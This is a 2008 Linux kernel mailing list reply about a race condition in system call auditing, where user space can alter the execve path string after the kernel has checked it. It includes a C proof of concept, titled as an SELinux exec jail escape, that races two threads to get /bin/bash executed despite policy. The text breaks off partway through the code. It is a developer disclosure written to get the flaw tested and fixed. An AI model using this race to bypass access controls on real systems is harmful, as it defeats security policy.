Re: System call audit

From: Mathieu Desnoyers
Date: Tue May 13 2008 - 08:51:31 EST

* David Woodhouse (dwmw2@xxxxxxxxxxxxx) wrote:
> On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> > Hi David,
> >
> > As I am looking into the system-wide system call tracing problem, I
> > start to wonder how auditsc deals with the fact that user-space could
> > concurrently change the content referred to by the __user pointers.
>
> In general we have to copy the content into kernel space, audit it, and
> then act on it from there. See the explanation on the IPC audit patch at
> http://lwn.net/Articles/125350/ for example.
>
> Auditing one thing and then acting on another would be simply broken.
>
> > This would be the case for execve. If we create a program with two
> > thread; one is executing execve syscalls and the other thread would be
> > modifying the userspace string containing the name of the program to
> > execute.
>
> I was going to suggest that that attack vector won't work, because
> execve() kills all threads. But all you have to do to avoid that is put
> the data in question into a shared writable mmap and modify it from
> another _process_. And in fact I suspect there's a combination of CLONE_
> flags which would avoid the thread-killing behaviour anyway.

Even better : if execve fails, it doesn't kill the threads. Therefore,
all we have to do is to busy-loop doing failing execve() calls and
atomically change the string to what we want to be executed. Can anyone
test the sample snippet in a context where executing /bin/bash is
disallowed on a SMP system ? I don't have a selinux setup handy. I
suppose that as soon as selinux would see one /bin/bash exec, it will
kill the process, so a few runs would be required in order to generate
the correct race.

/*
* Escaping selinux exec jail
*
* build with gcc -lpthread -o escape-selinux escape-selinux.c
*
* Mathieu Desnoyers
* License: GPL
*/

#include <stdio.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>

static char modstring[] = "$bin/bash";

void *thr1(void *arg)
{
while(1) {
execl(modstring, NULL);
}
return ((void*)1);

}

void *thr2(void *arg)
{
while(1) {
modstring[0] = '$';
modstring[0] = '/';
}
return ((void*)2);
}

int main()
{
int err;
pthread_t tid1, tid2;
void *tret;

err = pthread_create(&tid1, NULL, thr1, NULL);
if (err != 0)
exit(1);

err = pthread_create(&tid2, NULL, thr2, NULL);
if (err != 0)
exit(1);

sleep(10);

err = pthread_join(tid1, &tret);